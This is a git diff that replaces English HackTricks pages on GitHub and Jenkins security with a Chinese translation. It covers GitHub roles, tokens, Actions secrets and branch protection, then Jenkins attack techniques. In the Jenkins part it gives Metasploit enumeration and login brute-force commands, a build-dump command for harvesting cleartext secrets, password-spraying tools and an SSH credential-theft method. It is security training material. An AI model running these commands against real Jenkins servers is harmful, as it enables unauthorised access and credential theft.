**需要主动管理问题和拉取请求的贡献者**,但没有写入权限。 +- **写入**:推荐给 **积极推送到您的项目的贡献者**。 +- **维护**:推荐给 **需要管理代码库的项目经理**,但不需要访问敏感或破坏性操作。 +- **管理员**:推荐给需要 **对项目拥有完全访问权限** 的人,包括管理安全或删除代码库等敏感和破坏性操作。 -You can **compare the permissions** of each role in this table [https://docs.github.com/en/organizations/managing-access-to-your-organizations-repositories/repository-roles-for-an-organization#permissions-for-each-role](https://docs.github.com/en/organizations/managing-access-to-your-organizations-repositories/repository-roles-for-an-organization#permissions-for-each-role) +您可以在此表中 **比较每个角色的权限**:[https://docs.github.com/en/organizations/managing-access-to-your-organizations-repositories/repository-roles-for-an-organization#permissions-for-each-role](https://docs.github.com/en/organizations/managing-access-to-your-organizations-repositories/repository-roles-for-an-organization#permissions-for-each-role) -You can also **create your own roles** in _https://github.com/organizations/\/settings/roles_ +您还可以在 _https://github.com/organizations/\/settings/roles_ 中 **创建自己的角色**。 -### Teams +### 团队 -You can **list the teams created in an organization** in _https://github.com/orgs/\/teams_. Note that to see the teams which are children of other teams you need to access each parent team. +您可以在 _https://github.com/orgs/\/teams_ 中 **列出组织中创建的团队**。请注意,要查看其他团队的子团队,您需要访问每个父团队。 -### Users +### 用户 -The users of an organization can be **listed** in _https://github.com/orgs/\/people._ +组织的用户可以在 _https://github.com/orgs/\/people_ 中 **列出**。 -In the information of each user you can see the **teams the user is member of**, and the **repos the user has access to**. +在每个用户的信息中,您可以看到 **用户是哪个团队的成员**,以及 **用户可以访问的代码库**。 -## Github Authentication +## Github 认证 -Github offers different ways to authenticate to your account and perform actions on your behalf. +Github 提供不同的方式来验证您的帐户并代表您执行操作。 -### Web Access +### 网络访问 -Accessing **github.com** you can login using your **username and password** (and a **2FA potentially**). +访问 **github.com**,您可以使用 **用户名和密码**(以及 **可能的 2FA**)登录。 -### **SSH Keys** +### **SSH 密钥** -You can configure your account with one or several public keys allowing the related **private key to perform actions on your behalf.** [https://github.com/settings/keys](https://github.com/settings/keys) +您可以使用一个或多个公钥配置您的帐户,允许相关的 **私钥代表您执行操作**。[https://github.com/settings/keys](https://github.com/settings/keys) -#### **GPG Keys** +#### **GPG 密钥** -You **cannot impersonate the user with these keys** but if you don't use it it might be possible that you **get discover for sending commits without a signature**. Learn more about [vigilant mode here](https://docs.github.com/en/authentication/managing-commit-signature-verification/displaying-verification-statuses-for-all-of-your-commits#about-vigilant-mode). +您 **无法使用这些密钥冒充用户**,但如果您不使用它,可能会导致您 **在没有签名的情况下发送提交时被发现**。了解更多关于 [警惕模式的信息](https://docs.github.com/en/authentication/managing-commit-signature-verification/displaying-verification-statuses-for-all-of-your-commits#about-vigilant-mode)。 -### **Personal Access Tokens** +### **个人访问令牌** -You can generate personal access token to **give an application access to your account**. When creating a personal access token the **user** needs to **specify** the **permissions** to **token** will have. [https://github.com/settings/tokens](https://github.com/settings/tokens) +您可以生成个人访问令牌,以 **授予应用程序访问您的帐户**。创建个人访问令牌时,**用户** 需要 **指定** 令牌将拥有的 **权限**。[https://github.com/settings/tokens](https://github.com/settings/tokens) -### Oauth Applications +### Oauth 应用 -Oauth applications may ask you for permissions **to access part of your github information or to impersonate you** to perform some actions. A common example of this functionality is the **login with github button** you might find in some platforms. +Oauth 应用可能会请求您 **访问部分 GitHub 信息或冒充您** 执行某些操作。此功能的一个常见示例是您可能在某些平台上找到的 **使用 GitHub 登录按钮**。 -- You can **create** your own **Oauth applications** in [https://github.com/settings/developers](https://github.com/settings/developers) -- You can see all the **Oauth applications that has access to your account** in [https://github.com/settings/applications](https://github.com/settings/applications) -- You can see the **scopes that Oauth Apps can ask for** in [https://docs.github.com/en/developers/apps/building-oauth-apps/scopes-for-oauth-apps](https://docs.github.com/en/developers/apps/building-oauth-apps/scopes-for-oauth-apps) -- You can see third party access of applications in an **organization** in _https://github.com/organizations/\/settings/oauth_application_policy_ +- 您可以在 [https://github.com/settings/developers](https://github.com/settings/developers) 中 **创建** 您自己的 **Oauth 应用**。 +- 您可以在 [https://github.com/settings/applications](https://github.com/settings/applications) 中查看所有 **访问您帐户的 Oauth 应用**。 +- 您可以在 [https://docs.github.com/en/developers/apps/building-oauth-apps/scopes-for-oauth-apps](https://docs.github.com/en/developers/apps/building-oauth-apps/scopes-for-oauth-apps) 中查看 **Oauth 应用可以请求的范围**。 +- 您可以在 _https://github.com/organizations/\/settings/oauth_application_policy_ 中查看组织中应用程序的第三方访问。 -Some **security recommendations**: +一些 **安全建议**: -- An **OAuth App** should always **act as the authenticated GitHub user across all of GitHub** (for example, when providing user notifications) and with access only to the specified scopes.. -- An OAuth App can be used as an identity provider by enabling a "Login with GitHub" for the authenticated user. -- **Don't** build an **OAuth App** if you want your application to act on a **single repository**. With the `repo` OAuth scope, OAuth Apps can **act on \_all**\_\*\* of the authenticated user's repositorie\*\*s. -- **Don't** build an OAuth App to act as an application for your **team or company**. OAuth Apps authenticate as a **single user**, so if one person creates an OAuth App for a company to use, and then they leave the company, no one else will have access to it. -- **More** in [here](https://docs.github.com/en/developers/apps/getting-started-with-apps/about-apps#about-oauth-apps). +- **OAuth 应用** 应始终 **作为经过身份验证的 GitHub 用户在 GitHub 的所有地方操作**(例如,在提供用户通知时),并仅访问指定的范围。 +- OAuth 应用可以通过为经过身份验证的用户启用“使用 GitHub 登录”作为身份提供者。 +- **不要** 构建一个 **OAuth 应用**,如果您希望您的应用程序在 **单个代码库** 上操作。使用 `repo` OAuth 范围,OAuth 应用可以 **在所有**\*\* 经过身份验证的用户的代码库上操作\*\*。 +- **不要** 构建一个 OAuth 应用来作为您 **团队或公司的** 应用程序。OAuth 应用作为 **单个用户** 进行身份验证,因此如果一个人创建了一个供公司使用的 OAuth 应用,然后他们离开公司,其他人将无法访问它。 +- **更多** 信息在 [这里](https://docs.github.com/en/developers/apps/getting-started-with-apps/about-apps#about-oauth-apps)。 -### Github Applications +### Github 应用 -Github applications can ask for permissions to **access your github information or impersonate you** to perform specific actions over specific resources. In Github Apps you need to specify the repositories the app will have access to. +Github 应用可以请求权限以 **访问您的 GitHub 信息或冒充您** 执行特定操作。在 Github 应用中,您需要指定应用将访问的代码库。 -- To install a GitHub App, you must be an **organisation owner or have admin permissions** in a repository. -- The GitHub App should **connect to a personal account or an organisation**. -- You can create your own Github application in [https://github.com/settings/apps](https://github.com/settings/apps) -- You can see all the **Github applications that has access to your account** in [https://github.com/settings/apps/authorizations](https://github.com/settings/apps/authorizations) -- These are the **API Endpoints for Github Applications** [https://docs.github.com/en/rest/overview/endpoints-available-for-github-app](https://docs.github.com/en/rest/overview/endpoints-available-for-github-apps). Depending on the permissions of the App it will be able to access some of them -- You can see installed apps in an **organization** in _https://github.com/organizations/\/settings/installations_ +- 要安装 GitHub 应用,您必须是 **组织所有者或在代码库中拥有管理员权限**。 +- GitHub 应用应 **连接到个人帐户或组织**。 +- 您可以在 [https://github.com/settings/apps](https://github.com/settings/apps) 中创建自己的 GitHub 应用。 +- 您可以在 [https://github.com/settings/apps/authorizations](https://github.com/settings/apps/authorizations) 中查看所有 **访问您帐户的 GitHub 应用**。 +- 这些是 **GitHub 应用的 API 端点** [https://docs.github.com/en/rest/overview/endpoints-available-for-github-app](https://docs.github.com/en/rest/overview/endpoints-available-for-github-apps)。根据应用的权限,它将能够访问其中的一些。 +- 您可以在 _https://github.com/organizations/\/settings/installations_ 中查看组织中的已安装应用。 -Some security recommendations: +一些安全建议: -- A GitHub App should **take actions independent of a user** (unless the app is using a [user-to-server](https://docs.github.com/en/apps/building-github-apps/identifying-and-authorizing-users-for-github-apps#user-to-server-requests) token). To keep user-to-server access tokens more secure, you can use access tokens that will expire after 8 hours, and a refresh token that can be exchanged for a new access token. For more information, see "[Refreshing user-to-server access tokens](https://docs.github.com/en/apps/building-github-apps/refreshing-user-to-server-access-tokens)." -- Make sure the GitHub App integrates with **specific repositories**. -- The GitHub App should **connect to a personal account or an organisation**. -- Don't expect the GitHub App to know and do everything a user can. -- **Don't use a GitHub App if you just need a "Login with GitHub" service**. But a GitHub App can use a [user identification flow](https://docs.github.com/en/apps/building-github-apps/identifying-and-authorizing-users-for-github-apps) to log users in _and_ do other things. -- Don't build a GitHub App if you _only_ want to act as a GitHub user and do everything that user can do. -- If you are using your app with GitHub Actions and want to modify workflow files, you must authenticate on behalf of the user with an OAuth token that includes the `workflow` scope. The user must have admin or write permission to the repository that contains the workflow file. For more information, see "[Understanding scopes for OAuth apps](https://docs.github.com/en/apps/building-oauth-apps/understanding-scopes-for-oauth-apps/#available-scopes)." -- **More** in [here](https://docs.github.com/en/developers/apps/getting-started-with-apps/about-apps#about-github-apps). +- GitHub 应用应 **独立于用户采取行动**(除非应用使用 [用户到服务器](https://docs.github.com/en/apps/building-github-apps/identifying-and-authorizing-users-for-github-apps#user-to-server-requests) 令牌)。为了使用户到服务器的访问令牌更安全,您可以使用将在 8 小时后过期的访问令牌,以及可以交换为新访问令牌的刷新令牌。有关更多信息,请参见“[刷新用户到服务器的访问令牌](https://docs.github.com/en/apps/building-github-apps/refreshing-user-to-server-access-tokens)”。 +- 确保 GitHub 应用与 **特定代码库** 集成。 +- GitHub 应用应 **连接到个人帐户或组织**。 +- 不要期望 GitHub 应用知道并做用户可以做的所有事情。 +- **如果您只需要“使用 GitHub 登录”服务,请不要使用 GitHub 应用**。但是,GitHub 应用可以使用 [用户识别流程](https://docs.github.com/en/apps/building-github-apps/identifying-and-authorizing-users-for-github-apps) 来登录用户 _并_ 执行其他操作。 +- 如果您使用应用与 GitHub Actions,并希望修改工作流文件,您必须代表用户使用包含 `workflow` 范围的 OAuth 令牌进行身份验证。用户必须对包含工作流文件的代码库具有管理员或写入权限。有关更多信息,请参见“[了解 OAuth 应用的范围](https://docs.github.com/en/apps/building-oauth-apps/understanding-scopes-for-oauth-apps/#available-scopes)”。 +- **更多** 信息在 [这里](https://docs.github.com/en/developers/apps/getting-started-with-apps/about-apps#about-github-apps)。 ### Github Actions -This **isn't a way to authenticate in github**, but a **malicious** Github Action could get **unauthorised access to github** and **depending** on the **privileges** given to the Action several **different attacks** could be done. See below for more information. +这 **不是在 GitHub 中进行身份验证的方法**,但一个 **恶意** 的 GitHub Action 可能会获得 **未经授权的访问 GitHub**,并且 **根据** 赋予 Action 的 **权限**,可能会进行几种 **不同的攻击**。有关更多信息,请参见下文。 -## Git Actions +## Git 操作 -Git actions allows to automate the **execution of code when an event happen**. Usually the code executed is **somehow related to the code of the repository** (maybe build a docker container or check that the PR doesn't contain secrets). +Git 操作允许在事件发生时自动化 **代码的执行**。通常执行的代码与 **代码库的代码有某种关系**(可能构建一个 docker 容器或检查 PR 是否包含秘密)。 -### Configuration +### 配置 -In _https://github.com/organizations/\/settings/actions_ it's possible to check the **configuration of the github actions** for the organization. +在 _https://github.com/organizations/\/settings/actions_ 中,可以检查组织的 **GitHub Actions 配置**。 -It's possible to disallow the use of github actions completely, **allow all github actions**, or just allow certain actions. +可以完全禁止使用 GitHub Actions,**允许所有 GitHub Actions**,或仅允许某些操作。 -It's also possible to configure **who needs approval to run a Github Action** and the **permissions of the GITHUB_TOKEN** of a Github Action when it's run. +还可以配置 **谁需要批准才能运行 GitHub Action** 以及运行时 GitHub Action 的 **GITHUB_TOKEN 权限**。 -### Git Secrets +### Git 秘密 -Github Action usually need some kind of secrets to interact with github or third party applications. To **avoid putting them in clear-text** in the repo, github allow to put them as **Secrets**. - -These secrets can be configured **for the repo or for all the organization**. Then, in order for the **Action to be able to access the secret** you need to declare it like: +GitHub Action 通常需要某种秘密与 GitHub 或第三方应用程序进行交互。为了 **避免将它们以明文形式放入代码库**,GitHub 允许将它们作为 **秘密** 放置。 +这些秘密可以为 **代码库或整个组织** 配置。然后,为了使 **Action 能够访问秘密**,您需要将其声明为: ```yaml steps: - - name: Hello world action - with: # Set the secret as an input - super_secret:${{ secrets.SuperSecret }} - env: # Or as an environment variable - super_secret:${{ secrets.SuperSecret }} +- name: Hello world action +with: # Set the secret as an input +super_secret:${{ secrets.SuperSecret }} +env: # Or as an environment variable +super_secret:${{ secrets.SuperSecret }} ``` - -#### Example using Bash - +#### 使用 Bash 的示例 ```yaml steps: - - shell: bash - env: SUPER_SECRET:${{ secrets.SuperSecret }} - run: | - example-command "$SUPER_SECRET" +- shell: bash +env: SUPER_SECRET:${{ secrets.SuperSecret }} +run: | +example-command "$SUPER_SECRET" ``` - > [!WARNING] -> Secrets **can only be accessed from the Github Actions** that have them declared. +> Secrets **只能通过声明它们的 Github Actions 访问**。 -> Once configured in the repo or the organizations **users of github won't be able to access them again**, they just will be able to **change them**. +> 一旦在仓库或组织中配置,**github 用户将无法再次访问它们**,他们只能**更改它们**。 -Therefore, the **only way to steal github secrets is to be able to access the machine that is executing the Github Action** (in that scenario you will be able to access only the secrets declared for the Action). +因此,**窃取 github secrets 的唯一方法是能够访问执行 Github Action 的机器**(在这种情况下,您将只能访问为该 Action 声明的 secrets)。 -### Git Environments - -Github allows to create **environments** where you can save **secrets**. Then, you can give the github action access to the secrets inside the environment with something like: +### Git 环境 +Github 允许创建 **环境**,您可以在其中保存 **secrets**。然后,您可以通过类似以下方式授予 github action 访问环境中的 secrets: ```yaml jobs: - deployment: - runs-on: ubuntu-latest - environment: env_name +deployment: +runs-on: ubuntu-latest +environment: env_name ``` - -You can configure an environment to be **accessed** by **all branches** (default), **only protected** branches or **specify** which branches can access it.\ -It can also set a **number of required reviews** before **executing** an **action** using an **environment** or **wait** some **time** before allowing deployments to proceed. +您可以配置一个环境以**被所有分支访问**(默认),**仅受保护的**分支或**指定**可以访问它的分支。\ +它还可以设置**执行**某个**操作**之前所需的**审核数量**,或者**等待**一段**时间**再允许部署继续。 ### Git Action Runner -A Github Action can be **executed inside the github environment** or can be executed in a **third party infrastructure** configured by the user. +Github Action可以**在github环境中执行**,也可以在用户配置的**第三方基础设施**中执行。 -Several organizations will allow to run Github Actions in a **third party infrastructure** as it use to be **cheaper**. +一些组织将允许在**第三方基础设施**中运行Github Actions,因为这通常是**更便宜**的。 -You can **list the self-hosted runners** of an organization in _https://github.com/organizations/\/settings/actions/runners_ +您可以在 _https://github.com/organizations/\/settings/actions/runners_ 列出组织的自托管运行器。 -The way to find which **Github Actions are being executed in non-github infrastructure** is to search for `runs-on: self-hosted` in the Github Action configuration yaml. +查找**在非github基础设施中执行的Github Actions**的方法是搜索Github Action配置yaml中的 `runs-on: self-hosted`。 -It's **not possible to run a Github Action of an organization inside a self hosted box** of a different organization because **a unique token is generated for the Runner** when configuring it to know where the runner belongs. +**不可能在不同组织的自托管环境中运行组织的Github Action**,因为**在配置Runner时会生成一个唯一的令牌**以知道该Runner属于哪里。 -If the custom **Github Runner is configured in a machine inside AWS or GCP** for example, the Action **could have access to the metadata endpoint** and **steal the token of the service account** the machine is running with. +如果自定义**Github Runner配置在AWS或GCP内部的机器上**,例如,该Action**可能会访问元数据端点**并**窃取服务帐户的令牌**,该机器正在运行。 ### Git Action Compromise -If all actions (or a malicious action) are allowed a user could use a **Github action** that is **malicious** and will **compromise** the **container** where it's being executed. +如果允许所有操作(或恶意操作),用户可能会使用一个**恶意的Github Action**,这将**危害**正在执行的**容器**。 > [!CAUTION] -> A **malicious Github Action** run could be **abused** by the attacker to: +> 一个**恶意的Github Action**运行可能会被攻击者**滥用**: > -> - **Steal all the secrets** the Action has access to -> - **Move laterally** if the Action is executed inside a **third party infrastructure** where the SA token used to run the machine can be accessed (probably via the metadata service) -> - **Abuse the token** used by the **workflow** to **steal the code of the repo** where the Action is executed or **even modify it**. +> - **窃取所有秘密**,该Action可以访问 +> - **横向移动**,如果该Action在**第三方基础设施**中执行,可以访问用于运行机器的SA令牌(可能通过元数据服务) +> - **滥用工作流**使用的令牌,以**窃取执行该Action的repo的代码**或**甚至修改它**。 ## Branch Protections -Branch protections are designed to **not give complete control of a repository** to the users. The goal is to **put several protection methods before being able to write code inside some branch**. +分支保护旨在**不将完整控制权授予用户**。目标是**在能够在某个分支中编写代码之前设置多个保护方法**。 -The **branch protections of a repository** can be found in _https://github.com/\/\/settings/branches_ +**一个仓库的分支保护**可以在 _https://github.com/\/\/settings/branches_ 找到。 > [!NOTE] -> It's **not possible to set a branch protection at organization level**. So all of them must be declared on each repo. +> **不可能在组织级别设置分支保护**。因此,所有保护必须在每个repo中声明。 -Different protections can be applied to a branch (like to master): +可以对分支应用不同的保护(例如对master): -- You can **require a PR before merging** (so you cannot directly merge code over the branch). If this is select different other protections can be in place: - - **Require a number of approvals**. It's very common to require 1 or 2 more people to approve your PR so a single user isn't capable of merge code directly. - - **Dismiss approvals when new commits are pushed**. If not, a user may approve legit code and then the user could add malicious code and merge it. - - **Require reviews from Code Owners**. At least 1 code owner of the repo needs to approve the PR (so "random" users cannot approve it) - - **Restrict who can dismiss pull request reviews.** You can specify people or teams allowed to dismiss pull request reviews. - - **Allow specified actors to bypass pull request requirements**. These users will be able to bypass previous restrictions. -- **Require status checks to pass before merging.** Some checks needs to pass before being able to merge the commit (like a github action checking there isn't any cleartext secret). -- **Require conversation resolution before merging**. All comments on the code needs to be resolved before the PR can be merged. -- **Require signed commits**. The commits need to be signed. -- **Require linear history.** Prevent merge commits from being pushed to matching branches. -- **Include administrators**. If this isn't set, admins can bypass the restrictions. -- **Restrict who can push to matching branches**. Restrict who can send a PR. +- 您可以**要求在合并之前进行PR**(因此您不能直接在分支上合并代码)。如果选择此项,则可以实施其他不同的保护: +- **要求一定数量的批准**。通常需要1或2个以上的人批准您的PR,以便单个用户无法直接合并代码。 +- **在推送新提交时撤销批准**。否则,用户可能会批准合法代码,然后用户可以添加恶意代码并合并。 +- **要求代码所有者进行审核**。至少需要1个代码所有者批准PR(因此“随机”用户无法批准)。 +- **限制谁可以撤销拉取请求审核**。您可以指定允许撤销拉取请求审核的人员或团队。 +- **允许指定的参与者绕过拉取请求要求**。这些用户将能够绕过先前的限制。 +- **要求状态检查在合并之前通过**。某些检查需要在能够合并提交之前通过(例如,检查没有明文秘密的github action)。 +- **要求在合并之前解决对话**。所有代码上的评论需要在PR合并之前解决。 +- **要求签名提交**。提交需要签名。 +- **要求线性历史**。防止将合并提交推送到匹配的分支。 +- **包括管理员**。如果未设置此项,管理员可以绕过限制。 +- **限制谁可以推送到匹配的分支**。限制谁可以发送PR。 > [!NOTE] -> As you can see, even if you managed to obtain some credentials of a user, **repos might be protected avoiding you to pushing code to master** for example to compromise the CI/CD pipeline. +> 如您所见,即使您设法获得某个用户的凭据,**repos可能受到保护,避免您将代码推送到master**,例如,以危害CI/CD管道。 ## References @@ -253,7 +246,3 @@ Different protections can be applied to a branch (like to master): - [https://docs.github.com/en/actions/security-guides/encrypted-secrets](https://docs.github.com/en/actions/security-guides/encrypted-secrets) {{#include ../../banners/hacktricks-training.md}} - - - - diff --git a/src/pentesting-ci-cd/jenkins-security/README.md b/src/pentesting-ci-cd/jenkins-security/README.md index 4dfba3ff3..0145b1df9 100644 --- a/src/pentesting-ci-cd/jenkins-security/README.md +++ b/src/pentesting-ci-cd/jenkins-security/README.md @@ -2,311 +2,291 @@ {{#include ../../banners/hacktricks-training.md}} -## Basic Information +## 基本信息 -Jenkins is a tool that offers a straightforward method for establishing a **continuous integration** or **continuous delivery** (CI/CD) environment for almost **any** combination of **programming languages** and source code repositories using pipelines. Furthermore, it automates various routine development tasks. While Jenkins doesn't eliminate the **need to create scripts for individual steps**, it does provide a faster and more robust way to integrate the entire sequence of build, test, and deployment tools than one can easily construct manually. +Jenkins 是一个工具,提供了一种简单的方法来建立几乎 **任何** 编程语言和源代码库组合的 **持续集成** 或 **持续交付** (CI/CD) 环境,使用管道。此外,它还自动化了各种常规开发任务。虽然 Jenkins 并不消除 **为单个步骤创建脚本的需要**,但它确实提供了一种比手动构建更快、更强大的方式来集成整个构建、测试和部署工具的序列。 {{#ref}} basic-jenkins-information.md {{#endref}} -## Unauthenticated Enumeration - -In order to search for interesting Jenkins pages without authentication like (_/people_ or _/asynchPeople_, this lists the current users) you can use: +## 未经身份验证的枚举 +为了在没有身份验证的情况下搜索有趣的 Jenkins 页面,如 (_/people_ 或 _/asynchPeople_,这列出了当前用户),您可以使用: ``` msf> use auxiliary/scanner/http/jenkins_enum ``` - -Check if you can execute commands without needing authentication: - +检查您是否可以在不需要身份验证的情况下执行命令: ``` msf> use auxiliary/scanner/http/jenkins_command ``` +在没有凭据的情况下,您可以查看 _**/asynchPeople/**_ 路径或 _**/securityRealm/user/admin/search/index?q=**_ 以获取 **用户名**。 -Without credentials you can look inside _**/asynchPeople/**_ path or _**/securityRealm/user/admin/search/index?q=**_ for **usernames**. - -You may be able to get the Jenkins version from the path _**/oops**_ or _**/error**_ +您可能能够从路径 _**/oops**_ 或 _**/error**_ 获取 Jenkins 版本。 ![](<../../images/image (146).png>) -### Known Vulnerabilities +### 已知漏洞 {{#ref}} https://github.com/gquere/pwn_jenkins {{#endref}} -## Login +## 登录 -In the basic information you can check **all the ways to login inside Jenkins**: +在基本信息中,您可以检查 **所有登录 Jenkins 的方式**: {{#ref}} basic-jenkins-information.md {{#endref}} -### Register +### 注册 -You will be able to find Jenkins instances that **allow you to create an account and login inside of it. As simple as that.** +您将能够找到 **允许您创建帐户并登录的 Jenkins 实例。就这么简单。** -### **SSO Login** +### **SSO 登录** -Also if **SSO** **functionality**/**plugins** were present then you should attempt to **log-in** to the application using a test account (i.e., a test **Github/Bitbucket account**). Trick from [**here**](https://emtunc.org/blog/01/2018/research-misconfigured-jenkins-servers/). +如果存在 **SSO** **功能**/**插件**,那么您应该尝试使用测试帐户(即测试 **Github/Bitbucket 帐户**)登录应用程序。从 [**这里**](https://emtunc.org/blog/01/2018/research-misconfigured-jenkins-servers/) 获取技巧。 -### Bruteforce - -**Jenkins** lacks **password policy** and **username brute-force mitigation**. It's essential to **brute-force** users since **weak passwords** or **usernames as passwords** may be in use, even **reversed usernames as passwords**. +### 暴力破解 +**Jenkins** 缺乏 **密码策略** 和 **用户名暴力破解缓解**。对用户进行 **暴力破解** 是至关重要的,因为可能使用 **弱密码** 或 **用户名作为密码**,甚至 **反向用户名作为密码**。 ``` msf> use auxiliary/scanner/http/jenkins_login ``` +### 密码喷洒 -### Password spraying +使用 [这个 python 脚本](https://github.com/gquere/pwn_jenkins/blob/master/password_spraying/jenkins_password_spraying.py) 或 [这个 powershell 脚本](https://github.com/chryzsh/JenkinsPasswordSpray)。 -Use [this python script](https://github.com/gquere/pwn_jenkins/blob/master/password_spraying/jenkins_password_spraying.py) or [this powershell script](https://github.com/chryzsh/JenkinsPasswordSpray). +### IP 白名单绕过 -### IP Whitelisting Bypass +许多组织将 **基于 SaaS 的源代码管理 (SCM) 系统**(如 GitHub 或 GitLab)与 **内部自托管的 CI** 解决方案(如 Jenkins 或 TeamCity)结合使用。此设置允许 CI 系统 **接收来自 SaaS 源代码控制供应商的 webhook 事件**,主要用于触发管道作业。 -Many organizations combine **SaaS-based source control management (SCM) systems** such as GitHub or GitLab with an **internal, self-hosted CI** solution like Jenkins or TeamCity. This setup allows CI systems to **receive webhook events from SaaS source control vendors**, primarily for triggering pipeline jobs. +为了实现这一点,组织 **将 SCM 平台的 IP 范围列入白名单**,允许它们通过 **webhooks** 访问 **内部 CI 系统**。然而,重要的是要注意,**任何人**都可以在 GitHub 或 GitLab 上创建一个 **账户** 并将其配置为 **触发 webhook**,可能会向 **内部 CI 系统** 发送请求。 -To achieve this, organizations **whitelist** the **IP ranges** of the **SCM platforms**, permitting them to access the **internal CI system** via **webhooks**. However, it's important to note that **anyone** can create an **account** on GitHub or GitLab and configure it to **trigger a webhook**, potentially sending requests to the **internal CI system**. +检查: [https://www.paloaltonetworks.com/blog/prisma-cloud/repository-webhook-abuse-access-ci-cd-systems-at-scale/](https://www.paloaltonetworks.com/blog/prisma-cloud/repository-webhook-abuse-access-ci-cd-systems-at-scale/) -Check: [https://www.paloaltonetworks.com/blog/prisma-cloud/repository-webhook-abuse-access-ci-cd-systems-at-scale/](https://www.paloaltonetworks.com/blog/prisma-cloud/repository-webhook-abuse-access-ci-cd-systems-at-scale/) +## 内部 Jenkins 滥用 -## Internal Jenkins Abuses - -In these scenarios we are going to suppose you have a valid account to access Jenkins. +在这些场景中,我们假设您有一个有效的账户来访问 Jenkins。 > [!WARNING] -> Depending on the **Authorization** mechanism configured in Jenkins and the permission of the compromised user you **might be able or not to perform the following attacks.** +> 根据在 Jenkins 中配置的 **授权** 机制和被攻陷用户的权限,您 **可能能够或无法执行以下攻击**。 -For more information check the basic information: +有关更多信息,请查看基本信息: {{#ref}} basic-jenkins-information.md {{#endref}} -### Listing users +### 列出用户 -If you have accessed Jenkins you can list other registered users in [http://127.0.0.1:8080/asynchPeople/](http://127.0.0.1:8080/asynchPeople/) +如果您已访问 Jenkins,您可以在 [http://127.0.0.1:8080/asynchPeople/](http://127.0.0.1:8080/asynchPeople/) 列出其他注册用户。 -### Dumping builds to find cleartext secrets - -Use [this script](https://github.com/gquere/pwn_jenkins/blob/master/dump_builds/jenkins_dump_builds.py) to dump build console outputs and build environment variables to hopefully find cleartext secrets. +### 转储构建以查找明文秘密 +使用 [这个脚本](https://github.com/gquere/pwn_jenkins/blob/master/dump_builds/jenkins_dump_builds.py) 转储构建控制台输出和构建环境变量,以希望找到明文秘密。 ```bash python3 jenkins_dump_builds.py -u alice -p alice http://127.0.0.1:8080/ -o build_dumps cd build_dumps gitleaks detect --no-git -v ``` +### **窃取 SSH 凭证** -### **Stealing SSH Credentials** - -If the compromised user has **enough privileges to create/modify a new Jenkins node** and SSH credentials are already stored to access other nodes, he could **steal those credentials** by creating/modifying a node and **setting a host that will record the credentials** without verifying the host key: +如果被攻陷的用户具有 **足够的权限来创建/修改新的 Jenkins 节点**,并且 SSH 凭证已经存储以访问其他节点,他可以通过创建/修改一个节点并 **设置一个将记录凭证的主机** 而不验证主机密钥来 **窃取这些凭证**: ![](<../../images/image (218).png>) -You will usually find Jenkins ssh credentials in a **global provider** (`/credentials/`), so you can also dump them as you would dump any other secret. More information in the [**Dumping secrets section**](./#dumping-secrets). +您通常可以在 **全局提供者** (`/credentials/`) 中找到 Jenkins ssh 凭证,因此您也可以像转储任何其他秘密一样转储它们。更多信息请参见 [**转储秘密部分**](./#dumping-secrets)。 -### **RCE in Jenkins** +### **Jenkins 中的 RCE** -Getting a **shell in the Jenkins server** gives the attacker the opportunity to leak all the **secrets** and **env variables** and to **exploit other machines** located in the same network or even **gather cloud credentials**. +在 Jenkins 服务器上获得 **shell** 使攻击者有机会泄露所有 **秘密** 和 **环境变量**,并 **利用同一网络中的其他机器**,甚至 **收集云凭证**。 -By default, Jenkins will **run as SYSTEM**. So, compromising it will give the attacker **SYSTEM privileges**. +默认情况下,Jenkins 将 **以 SYSTEM 身份运行**。因此,攻陷它将使攻击者获得 **SYSTEM 权限**。 -### **RCE Creating/Modifying a project** +### **创建/修改项目的 RCE** -Creating/Modifying a project is a way to obtain RCE over the Jenkins server: +创建/修改项目是获得 Jenkins 服务器 RCE 的一种方式: {{#ref}} jenkins-rce-creating-modifying-project.md {{#endref}} -### **RCE Execute Groovy script** +### **执行 Groovy 脚本的 RCE** -You can also obtain RCE executing a Groovy script, which might my stealthier than creating a new project: +您还可以通过执行 Groovy 脚本来获得 RCE,这可能比创建新项目更隐蔽: {{#ref}} jenkins-rce-with-groovy-script.md {{#endref}} -### RCE Creating/Modifying Pipeline +### 创建/修改管道的 RCE -You can also get **RCE by creating/modifying a pipeline**: +您还可以通过 **创建/修改管道** 来获得 **RCE**: {{#ref}} jenkins-rce-creating-modifying-pipeline.md {{#endref}} -## Pipeline Exploitation +## 管道利用 -To exploit pipelines you still need to have access to Jenkins. +要利用管道,您仍然需要访问 Jenkins。 -### Build Pipelines +### 构建管道 -**Pipelines** can also be used as **build mechanism in projects**, in that case it can be configured a **file inside the repository** that will contains the pipeline syntax. By default `/Jenkinsfile` is used: +**管道** 也可以用作 **项目中的构建机制**,在这种情况下,可以配置一个 **存储库中的文件**,该文件将包含管道语法。默认使用 `/Jenkinsfile`: ![](<../../images/image (127).png>) -It's also possible to **store pipeline configuration files in other places** (in other repositories for example) with the goal of **separating** the repository **access** and the pipeline access. +还可以 **将管道配置文件存储在其他地方**(例如在其他存储库中),目的是 **分离** 存储库 **访问** 和管道访问。 -If an attacker have **write access over that file** he will be able to **modify** it and **potentially trigger** the pipeline without even having access to Jenkins.\ -It's possible that the attacker will need to **bypass some branch protections** (depending on the platform and the user privileges they could be bypassed or not). +如果攻击者对该文件具有 **写入访问权限**,他将能够 **修改** 它并 **可能触发** 管道,而无需访问 Jenkins。\ +攻击者可能需要 **绕过一些分支保护**(根据平台和用户权限,这些保护可能会被绕过或不被绕过)。 -The most common triggers to execute a custom pipeline are: +执行自定义管道的最常见触发器是: -- **Pull request** to the main branch (or potentially to other branches) -- **Push to the main branch** (or potentially to other branches) -- **Update the main branch** and wait until it's executed somehow +- **向主分支的拉取请求**(或可能是其他分支) +- **推送到主分支**(或可能是其他分支) +- **更新主分支** 并等待以某种方式执行 > [!NOTE] -> If you are an **external user** you shouldn't expect to create a **PR to the main branch** of the repo of **other user/organization** and **trigger the pipeline**... but if it's **bad configured** you could fully **compromise companies just by exploiting this**. +> 如果您是 **外部用户**,您不应该期望创建 **PR 到其他用户/组织的主分支** 并 **触发管道**... 但如果配置 **不当**,您可能会通过利用这一点完全 **攻陷公司**。 -### Pipeline RCE +### 管道 RCE -In the previous RCE section it was already indicated a technique to [**get RCE modifying a pipeline**](./#rce-creating-modifying-pipeline). +在前面的 RCE 部分中,已经指明了一种技术来 [**通过修改管道获取 RCE**](./#rce-creating-modifying-pipeline)。 -### Checking Env variables - -It's possible to declare **clear text env variables** for the whole pipeline or for specific stages. This env variables **shouldn't contain sensitive 